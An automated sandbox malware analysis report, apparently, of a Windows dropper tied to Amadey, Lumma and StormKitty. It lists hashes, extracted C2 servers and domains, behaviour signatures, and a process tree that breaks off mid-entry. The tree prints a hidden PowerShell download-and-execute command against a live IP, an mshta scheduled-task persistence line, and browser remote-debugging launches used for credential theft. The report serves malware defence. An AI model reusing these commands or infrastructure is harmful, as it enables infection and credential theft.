Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/04/2025, 14:47

General

  • Target

    2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    5a330d82f7fb0451f97614b063c754cb

  • SHA1

    f81620609e53bcaeed1c636f9a7552474a0d18b9

  • SHA256

    7c91a1dcb3bdc0ff94a9f4dce61cf5db01eed3b6c7971dfa0f9ad0fc668efbdd

  • SHA512

    ca5615a9e6c1a34b246b0f6e397d01d3298e4798bbaa8baf7dc4f29a951ec7c2a5140100afd0912538356f851edcffdff11b5169f4664ff448965d6515a5e89a

  • SSDEEP

    24576:KqDEvCTbMWu7rQYlBQcBiT6rprG8a0Mu:KTvC/MTQYxsWR7a0M

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://2travelilx.top/GSKAiz

https://jrxsafer.top/shpaoz

https://plantainklj.run/opafg

https://puerrogfh.live/iqwez

https://quavabvc.top/iuzhd

https://-furthert.run/azpp

https://targett.top/dsANGt

https://rambutanvcx.run/adioz

https://ywmedici.top/noagis

https://easyfwdr.digital/azxs

https://jjrxsafer.top/shpaoz

https://upuerrogfh.live/iqwez

https://furthert.run/azpp

https://reformzv.digital/guud

https://apuerrogfh.live/iqwez

https://vquavabvc.top/iuzhd

https://advennture.top/GKsiio

https://0targett.top/dsANGt

https://uywmedici.top/noagis

https://nadvennture.top/GKsiio

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file 13 IoCs
  • Uses browser remote debugging 2 TTPs 10 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 21 IoCs
  • Identifies Wine through registry keys 2 TTPs 5 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 4 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 14 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 9 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 38 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 28 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 41 IoCs
  • Suspicious use of SendNotifyMessage 27 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-04-07_5a330d82f7fb0451f97614b063c754cb_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2964
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3632
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn GzgPtmadBI5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:4928
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\TJ9oCeFwZ.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:5884
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2904
        • C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE
          "C:\Users\Admin\AppData\Local\Temp27C2KFYDLM6L1NNSXDVNPW5AZ6AVUMTA.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5476
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:5392
            • C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe
              "C:\Users\Admin\AppData\Local\Temp\10492200101\v1BRaoR.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3916
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:4536
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4536 -s 1384
                  8⤵
                  • Program crash
                  PID:1984
            • C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe
              "C:\Users\Admin\AppData\Local\Temp\10492700101\Nehh6wZ.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3860
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:860
            • C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe
              "C:\Users\Admin\AppData\Local\Temp\10493560101\31W3sid.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3004
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • Checks SCSI registry key(s)
                PID:1248
            • C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe
              "C:\Users\Admin\AppData\Local\Temp\10494280101\NlmvJyQ.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:816
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1564
            • C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe
              "C:\Users\Admin\AppData\Local\Temp\10494470101\efd0386a9c.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:4460
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5500
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 1328
                  8⤵
                  • Program crash
                  PID:1748
            • C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe
              "C:\Users\Admin\AppData\Local\Temp\10494480101\5c814807ae.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2704
            • C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe
              "C:\Users\Admin\AppData\Local\Temp\10494490101\352038b977.exe"
              6⤵
              • Checks BIOS information in registry
              • Executes dropped EXE
              PID:5656
            • C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe
              "C:\Users\Admin\AppData\Local\Temp\10494500101\efe6bfcae2.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of FindShellTrayWindow
              • Suspicious use of SendNotifyMessage
              PID:5528
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM firefox.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3916
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM chrome.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5964
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM msedge.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3368
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM opera.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1496
              • C:\Windows\SysWOW64\taskkill.exe
                taskkill /F /IM brave.exe /T
                7⤵
                • System Location Discovery: System Language Discovery
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3964
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                7⤵
                  PID:2504
                  • C:\Program Files\Mozilla Firefox\firefox.exe
                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    8⤵
                    • Checks processor information in registry
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    • Suspicious use of SetWindowsHookEx
                    PID:2384
                    • C:\Program Files\Mozilla Firefox\firefox.exe
                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2000 -prefsLen 27099 -prefMapHandle 2004 -prefMapSize 270279 -ipcHandle 2080 -initialChannelId {e180e26d-d945-4f8d-928c-60d98a3067d4} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                      9⤵
                        PID:4476
                      • C:\Program Files\Mozilla Firefox\firefox.exe
                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2500 -prefsLen 27135 -prefMapHandle 2504 -prefMapSize 270279 -ipcHandle 2512 -initialChannelId {f1e29b3c-231c-4149-b88c-51c64f47aa84} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                        9⤵
                          PID:5748
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3888 -prefsLen 25164 -prefMapHandle 3892 -prefMapSize 270279 -jsInitHandle 3896 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3904 -initialChannelId {ddbefdf2-d68e-462c-a6a6-233f45aed643} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                          9⤵
                          • Checks processor information in registry
                          PID:5044
                        • C:\Program Files\Mozilla Firefox\firefox.exe
                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4048 -prefsLen 27276 -prefMapHandle 4052 -prefMapSize 270279 -ipcHandle 4148 -initialChannelId {d407d8ce-9ca9-408f-b101-553da4b8041b} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                          9⤵
                            PID:5588
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3128 -prefsLen 34775 -prefMapHandle 3920 -prefMapSize 270279 -jsInitHandle 2740 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 4404 -initialChannelId {8eeeea2e-fde5-4898-a67c-adcb5eb7320c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                            9⤵
                            • Checks processor information in registry
                            PID:2624
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5076 -prefsLen 35012 -prefMapHandle 5080 -prefMapSize 270279 -ipcHandle 5088 -initialChannelId {bcc20330-895b-44d9-9421-183aa661e926} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                            9⤵
                            • Checks processor information in registry
                            PID:4800
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5276 -prefsLen 32952 -prefMapHandle 5272 -prefMapSize 270279 -jsInitHandle 5268 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5368 -initialChannelId {c135734b-7074-4689-adfe-12e903c2f35a} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                            9⤵
                            • Checks processor information in registry
                            PID:3652
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5540 -prefsLen 32952 -prefMapHandle 5544 -prefMapSize 270279 -jsInitHandle 5548 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5376 -initialChannelId {3c776e85-7713-4287-b9a8-07cdcc52e05c} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                            9⤵
                            • Checks processor information in registry
                            PID:4676
                          • C:\Program Files\Mozilla Firefox\firefox.exe
                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5736 -prefsLen 32952 -prefMapHandle 5740 -prefMapSize 270279 -jsInitHandle 5744 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5572 -initialChannelId {0125919d-f302-412e-ba94-1443c101c631} -parentPid 2384 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2384" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                            9⤵
                            • Checks processor information in registry
                            PID:3004
                    • C:\Windows\SysWOW64\msiexec.exe
                      "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\10494510271\33e3372c0a.msi" /quiet
                      6⤵
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3412
                    • C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10494520101\367de4acd7.exe"
                      6⤵
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      PID:5776
                    • C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe
                      "C:\Users\Admin\AppData\Local\Temp\10494530101\f078cfe6f7.exe"
                      6⤵
                      • Executes dropped EXE
                      PID:632
                    • C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe
                      "C:\Users\Admin\AppData\Local\Temp\10494540101\31W3sid.exe"
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:396
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        7⤵
                        • Checks SCSI registry key(s)
                        PID:2096
                    • C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe
                      "C:\Users\Admin\AppData\Local\Temp\10494550101\DgQBvwg.exe"
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Suspicious use of SetThreadContext
                      PID:5776
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\girrhuqn\girrhuqn.cmdline"
                        7⤵
                          PID:5412
                          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB263.tmp" "c:\Users\Admin\AppData\Local\Temp\girrhuqn\CSCFD411049ADB451ABD77B5F2146D9A25.TMP"
                            8⤵
                              PID:4852
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                            7⤵
                            • Downloads MZ/PE file
                            • Accesses Microsoft Outlook accounts
                            • Accesses Microsoft Outlook profiles
                            • Suspicious use of SetThreadContext
                            • Drops file in Program Files directory
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            • Suspicious behavior: AddClipboardFormatListener
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SetWindowsHookEx
                            • outlook_office_path
                            • outlook_win_path
                            PID:4472
                            • C:\Windows\system32\rundll32.exe
                              "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                              8⤵
                              • Modifies registry class
                              • Suspicious use of FindShellTrayWindow
                              PID:3756
                            • C:\Windows\system32\rundll32.exe
                              "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                              8⤵
                              • Modifies registry class
                              • Suspicious use of FindShellTrayWindow
                              PID:3860
                            • C:\Windows\system32\rundll32.exe
                              "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61
                              8⤵
                              • Modifies registry class
                              • Suspicious use of FindShellTrayWindow
                              PID:2804
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              --restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"
                              8⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:4036
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x24c,0x7ffb818cf208,0x7ffb818cf214,0x7ffb818cf220
                                9⤵
                                  PID:4996
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2284,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:3
                                  9⤵
                                    PID:4444
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2244,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:2
                                    9⤵
                                      PID:5324
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2648,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:8
                                      9⤵
                                        PID:3468
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3584,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
                                        9⤵
                                        • Uses browser remote debugging
                                        PID:1468
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3600,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3588 /prefetch:1
                                        9⤵
                                        • Uses browser remote debugging
                                        PID:1940
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5012,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5008 /prefetch:1
                                        9⤵
                                        • Uses browser remote debugging
                                        PID:4452
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --pdf-upsell-enabled --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=5068,i,7821679200795863910,9942531140132333327,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=5064 /prefetch:1
                                        9⤵
                                        • Uses browser remote debugging
                                        PID:4568
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      --restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"
                                      8⤵
                                      • Uses browser remote debugging
                                      • Enumerates system info in registry
                                      • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                      • Suspicious use of FindShellTrayWindow
                                      PID:6440
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
